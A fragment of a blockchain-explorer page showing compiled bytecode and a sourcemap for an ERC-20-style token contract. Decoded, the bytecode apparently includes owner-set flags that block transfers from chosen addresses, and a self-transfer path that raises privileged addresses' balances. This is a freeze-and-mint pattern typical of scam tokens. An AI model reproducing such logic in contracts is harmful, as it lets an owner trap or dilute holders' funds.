152604080832087870390559387168252838220805487019055918152600390915220548490849060ff1680610a5057506001600160a01b03811660009081526003602052604090205460ff165b15610a9c57806001600160a01b0316826001600160a01b031603610a9c576001600160a01b03821660009081526001602052604081208054869290610a96908490610e21565b90915550505b846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef86604051610ae191815260200190565b60405180910390a3505050505050565b6001600160a01b038216610b515760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840161055f565b6001600160a01b03821660009081526001602052604090205481811015610bc55760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840161055f565b6001600160a01b03831660008181526001602090815260408083208686039055600580548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610815565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b81811015610c9a57858101830151858201604001528201610c7e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610cd257600080fd5b919050565b60008060408385031215610cea57600080fd5b610cf383610cbb565b915060208301358015158114610d0857600080fd5b809150509250929050565b60008060408385031215610d2657600080fd5b610d2f83610cbb565b946020939093013593505050565b600080600060608486031215610d5257600080fd5b610d5b84610cbb565b9250610d6960208501610cbb565b9150604084013590509250925092565b600060208284031215610d8b57600080fd5b5035919050565b600060208284031215610da457600080fd5b610dad82610cbb565b9392505050565b60008060408385031215610dc757600080fd5b610dd083610cbb565b9150610dde60208401610cbb565b90509250929050565b600181811c90821680610dfb57607f821691505b602082108103610e1b57634e487b7160e01b600052602260045260246000fd5b50919050565b8082018082111561040b57634e487b7160e01b600052601160045260246000fdfea264697066735822122056a01ef58d0835a21fad01a6c1f50ace52299763a9e8a5827f4796635aad894464736f6c63430008120033

Deployed Bytecode Sourcemap

16592:494:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4352:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4673:117;;;;;;:::i;:::-;;:::i;:::-;;6315:201;;;;;;:::i;:::-;;:::i;:::-;;;1521:14:1;;1514:22;1496:41;;1484:2;1469:18;6315:201:0;1356:187:1;5139:108:0;5227:12;;5139:108;;;1694:25:1;;;1682:2;1667:18;5139:108:0;1548:177:1;7096:295:0;;;;;;:::i;:::-;;:::i;4572:93::-;;;4655:2;2205:36:1;;2193:2;2178:18;4572:93:0;2063:184:1;7800:238:0;;;;;;:::i;:::-;;:::i;15932:91::-;;;;;;:::i;:::-;;:::i;4798:106::-;;;;;;:::i;:::-;;:::i;5255:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;5356:18:0;5329:7;5356:18;;;:9;:18;;;;;;;5255:127;1534:103;;;:::i;5021:110::-;;;;;;:::i;:::-;-1:-1:-1;;;;;5104:19:0;5080:4;5104:19;;;:10;:19;;;;;;;;;5021:110;16342:164;;;;;;:::i;:::-;;:::i;3963:41::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;4912:101;;;;;;:::i;:::-;;:::i;886:87::-;932:7;959:6;886:87;;-1:-1:-1;;;;;959:6:0;;;2774:51:1;;2762:2;2747:18;886:87:0;2628:203:1;4460:104:0;;;:::i;8541:436::-;;;;;;:::i;:::-;;:::i;5588:193::-;;;;;;:::i;:::-;;:::i;16817:266::-;;;;;;:::i;:::-;;:::i;5844:151::-;;;;;;:::i;:::-;;:::i;1792:201::-;;;;;;:::i;:::-;;:::i;4352:100::-;4406:13;4439:5;4432:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4352:100;:::o;4673:117::-;772:13;:11;:13::i;:::-;-1:-1:-1;;;;;4754:17:0;;;::::1;;::::0;;;:8:::1;:17;::::0;;;;:28;;-1:-1:-1;;4754:28:0::1;::::0;::::1;;::::0;;;::::1;::::0;;4673:117::o;6315:201::-;6398:4;256:10;6454:32;256:10;6470:7;6479:6;6454:8;:32::i;:::-;6504:4;6497:11;;;6315:201;;;;;:::o;7096:295::-;7227:4;256:10;7285:38;7301:4;256:10;7316:6;7285:15;:38::i;:::-;7334:27;7344:4;7350:2;7354:6;7334:9;:27::i;:::-;-1:-1:-1;7379:4:0;;7096:295;-1:-1:-1;;;;7096:295:0:o;7800:238::-;7888:4;256:10;7944:64;256:10;7960:7;7997:10;7969:25;256:10;7960:7;7969:9;:25::i;:::-;:38;;;;:::i;:::-;7944:8;:64::i;15932:91::-;15988:27;256:10;16008:6;15988:5;:27::i;:::-;15932:91;:::o;4798:106::-;772:13;:11;:13::i;:::-;-1:-1:-1;;;;;4869:19:0::1;4891:5;4869:19:::0;;;:10:::1;:19;::::0;;;;:27;;-1:-1:-1;;4869:27:0::1;::::0;;4798:106::o;1534:103::-;772:13;:11;:13::i;:::-;1599:30:::1;1626:1;1599:18;:30::i;:::-;1534:103::o:0;16342:164::-;16419:46;16435:7;256:10;16458:6;16419:15;:46::i;:::-;16476:22;16482:7;16491:6;16476:5;:22::i;:::-;16342:164;;:::o;4912:101::-;772:13;:11;:13::i;:::-;-1:-1:-1;;;;;4979:19:0::1;;::::0;;;:10:::1;:19;::::0;;;;:26;;-1:-1:-1;;4979:26:0::1;5001:4;4979:26;::::0;;4912:101::o;4460:104::-;4516:13;4549:7;4542:14;;;;;:::i;8541:436::-;8634:4;256:10;8634:4;8717:25;256:10;8734:7;8717:9;:25::i;:::-;8690:52;;8781:15;8761:16;:35;;8753:85;;;;-1:-1:-1;;;8753:85:0;;3915:2:1;8753:85:0;;;3897:21:1;3954:2;3934:18;;;3927:30;3993:34;3973:18;;;3966:62;-1:-1:-1;;;4044:18:1;;;4037:35;4089:19;;8753:85:0;;;;;;;;;8874:60;8883:5;8890:7;8918:15;8899:16;:34;8874:8;:60::i;5588:193::-;5667:4;256:10;5723:28;256:10;5740:2;5744:6;5723:9;:28::i;16817:266::-;772:13;:11;:13::i;:::-;16928:10:::1;16901:14;5356:18:::0;;;:9;:18;;;;;;16683:23:::1;16958:24:::0;::::1;16950:63;;;::::0;-1:-1:-1;;;16950:63:0;;4321:2:1;16950:63:0::1;::::0;::::1;4303:21:1::0;4360:2;4340:18;;;4333:30;4399:28;4379:18;;;4372:56;4445:18;;16950:63:0::1;4119:350:1::0;16950:63:0::1;17026:49;17036:10;17048:18;17068:6;17026:9;:49::i;5844:151::-:0;-1:-1:-1;;;;;5960:18:0;;;5933:7;5960:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;5844:151::o;1792:201::-;772:13;:11;:13::i;:::-;-1:-1:-1;;;;;1881:22:0;::::1;1873:73;;;::::0;-1:-1:-1;;;1873:73:0;;4676:2:1;1873:73:0::1;::::0;::::1;4658:21:1::0;4715:2;4695:18;;;4688:30;4754:34;4734:18;;;4727:62;-1:-1:-1;;;4805:18:1;;;4798:36;4851:19;;1873:73:0::1;4474:402:1::0;1873:73:0::1;1957:28;1976:8;1957:18;:28::i;1051:132::-:0;932:7;959:6;-1:-1:-1;;;;;959:6:0;256:10;1115:23;1107:68;;;;-1:-1:-1;;;1107:68:0;;5083:2:1;1107:68:0;;;5065:21:1;;;5102:18;;;5095:30;5161:34;5141:18;;;5134:62;5213:18;;1107:68:0;4881:356:1;12759:380:0;-1:-1:-1;;;;;12895:19:0;;12887:68;;;;-1:-1:-1;;;12887:68:0;;5444:2:1;12887:68:0;;;5426:21:1;5483:2;5463:18;;;5456:30;5522:34;5502:18;;;5495:62;-1:-1:-1;;;5573:18:1;;;5566:34;5617:19;;12887:68:0;5242:400:1;12887:68:0;-1:-1:-1;;;;;12974:21:0;;12966:68;;;;-1:-1:-1;;;12966:68:0;;5849:2:1;12966:68:0;;;5831:21:1;5888:2;5868:18;;;5861:30;5927:34;5907:18;;;5900:62;-1:-1:-1;;;5978:18:1;;;5971:32;6020:19;;12966:68:0;5647:398:1;12966:68:0;-1:-1:-1;;;;;13047:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;13099:32;;1694:25:1;;;13099:32:0;;1667:18:1;13099:32:0;;;;;;;;12759:380;;;:::o;13430:453::-;13565:24;13592:25;13602:5;13609:7;13592:9;:25::i;:::-;13565:52;;-1:-1:-1;;13632:16:0;:37;13628:248;;13714:6;13694:16;:26;;13686:68;;;;-1:-1:-1;;;13686:68:0;;6252:2:1;13686:68:0;;;6234:21:1;6291:2;6271:18;;;6264:30;6330:31;6310:18;;;6303:59;6379:18;;13686:68:0;6050:353:1;13686:68:0;13798:51;13807:5;13814:7;13842:6;13823:16;:25;13798:8;:51::i;:::-;13554:329;13430:453;;;:::o;9447:1027::-;-1:-1:-1;;;;;9578:16:0;;9570:64;;;;-1:-1:-1;;;9570:64:0;;6610:2:1;9570:64:0;;;6592:21:1;6649:2;6629:18;;;6622:30;6688:34;6668:18;;;6661:62;-1:-1:-1;;;6739:18:1;;;6732:33;6782:19;;9570:64:0;6408:399:1;9570:64:0;-1:-1:-1;;;;;9654:16:0;;;;;;:10;:16;;;;;;;;9653:17;9645:67;;;;-1:-1:-1;;;9645:67:0;;7014:2:1;9645:67:0;;;6996:21:1;7053:2;7033:18;;;7026:30;7092:34;7072:18;;;7065:62;-1:-1:-1;;;7143:18:1;;;7136:35;7188:19;;9645:67:0;6812:401:1;9645:67:0;-1:-1:-1;;;;;9798:15:0;;9776:19;9798:15;;;:9;:15;;;;;;9832:25;;;;9824:76;;;;-1:-1:-1;;;9824:76:0;;7420:2:1;9824:76:0;;;7402:21:1;7459:2;7439:18;;;7432:30;7498:34;7478:18;;;7471:62;-1:-1:-1;;;7549:18:1;;;7542:36;7595:19;;9824:76:0;7218:402:1;9824:76:0;-1:-1:-1;;;;;9938:15:0;;;;;;;:9;:15;;;;;;;;9956:20;;;9938:38;;10156:13;;;;;;;;:23;;;;;;10278:14;;;:8;:14;;;;;9948:4;;10166:2;;10278:14;;;:32;;-1:-1:-1;;;;;;10296:14:0;;;;;;:8;:14;;;;;;;;10278:32;10275:98;;;10340:4;-1:-1:-1;;;;;10332:12:0;:4;-1:-1:-1;;;;;10332:12:0;;10328:43;;-1:-1:-1;;;;;10346:15:0;;;;;;:9;:15;;;;;:25;;10365:6;;10346:15;:25;;10365:6;;10346:25;:::i;:::-;;;;-1:-1:-1;;10328:43:0;10405:2;-1:-1:-1;;;;;10390:26:0;10399:4;-1:-1:-1;;;;;10390:26:0;;10409:6;10390:26;;;;1694:25:1;;1682:2;1667:18;;1548:177;10390:26:0;;;;;;;;9559:915;;;9447:1027;;;:::o;11642:675::-;-1:-1:-1;;;;;11726:21:0;;11718:67;;;;-1:-1:-1;;;11718:67:0;;7827:2:1;11718:67:0;;;7809:21:1;7866:2;7846:18;;;7839:30;7905:34;7885:18;;;7878:62;-1:-1:-1;;;7956:18:1;;;7949:31;7997:19;;11718:67:0;7625:397:1;11718:67:0;-1:-1:-1;;;;;11885:18:0;;11860:22;11885:18;;;:9;:18;;;;;;11922:24;;;;11914:71;;;;-1:-1:-1;;;11914:71:0;;8229:2:1;11914:71:0;;;8211:21:1;8268:2;8248:18;;;8241:30;8307:34;8287:18;;;8280:62;-1:-1:-1;;;8358:18:1;;;8351:32;8400:19;;11914:71:0;8027:398:1;11914:71:0;-1:-1:-1;;;;;12021:18:0;;;;;;:9;:18;;;;;;;;12042:23;;;12021:44;;12160:12;:22;;;;;;;12211:37;1694:25:1;;;12021:18:0;;;12211:37;;1667:18:1;12211:37:0;1548:177:1;2153:191:0;2227:16;2246:6;;-1:-1:-1;;;;;2263:17:0;;;-1:-1:-1;;;;;;2263:17:0;;;;;;2296:40;;2246:6;;;;;;;2296:40;;2227:16;2296:40;2216:128;2153:191;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:347::-;810:6;818;871:2;859:9;850:7;846:23;842:32;839:52;;;887:1;884;877:12;839:52;910:29;929:9;910:29;:::i;:::-;900:39;;989:2;978:9;974:18;961:32;1036:5;1029:13;1022:21;1015:5;1012:32;1002:60;;1058:1;1055;1048:12;1002:60;1081:5;1071:15;;;745:347;;;;;:::o;1097:254::-;1165:6;1173;1226:2;1214:9;1205:7;1201:23;1197:32;1194:52;;;1242:1;1239;1232:12;1194:52;1265:29;1284:9;1265:29;:::i;:::-;1255:39;1341:2;1326:18;;;;1313:32;;-1:-1:-1;;;1097:254:1:o;1730:328::-;1807:6;1815;1823;1876:2;1864:9;1855:7;1851:23;1847:32;1844:52;;;1892:1;1889;1882:12;1844:52;1915:29;1934:9;1915:29;:::i;:::-;1905:39;;1963:38;1997:2;1986:9;1982:18;1963:38;:::i;:::-;1953:48;;2048:2;2037:9;2033:18;2020:32;2010:42;;1730:328;;;;;:::o;2252:180::-;2311:6;2364:2;2352:9;2343:7;2339:23;2335:32;2332:52;;;2380:1;2377;2370:12;2332:52;-1:-1:-1;2403:23:1;;2252:180;-1:-1:-1;2252:180:1:o;2437:186::-;2496:6;2549:2;2537:9;2528:7;2524:23;2520:32;2517:52;;;2565:1;2562;2555:12;2517:52;2588:29;2607:9;2588:29;:::i;:::-;2578:39;2437:186;-1:-1:-1;;;2437:186:1:o;2836:260::-;2904:6;2912;2965:2;2953:9;2944:7;2940:23;2936:32;2933:52;;;2981:1;2978;2971:12;2933:52;3004:29;3023:9;3004:29;:::i;:::-;2994:39;;3052:38;3086:2;3075:9;3071:18;3052:38;:::i;:::-;3042:48;;2836:260;;;;;:::o;3101:380::-;3180:1;3176:12;;;;3223;;;3244:61;;3298:4;3290:6;3286:17;3276:27;;3244:61;3351:2;3343:6;3340:14;3320:18;3317:38;3314:161;;3397:10;3392:3;3388:20;3385:1;3378:31;3432:4;3429:1;3422:15;3460:4;3457:1;3450:15;3314:161;;3101:380;;;:::o;3486:222::-;3551:9;;;3572:10;;;3569:133;;;3624:10;3619:3;3615:20;3612:1;3605:31;3659:4;3656:1;3649:15;3687:4;3684:1;3677:15

Swarm Source

ipfs://56a01ef58d0835a21fad01a6c1f50ace52299763a9e8a5827f4796635aad8944
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.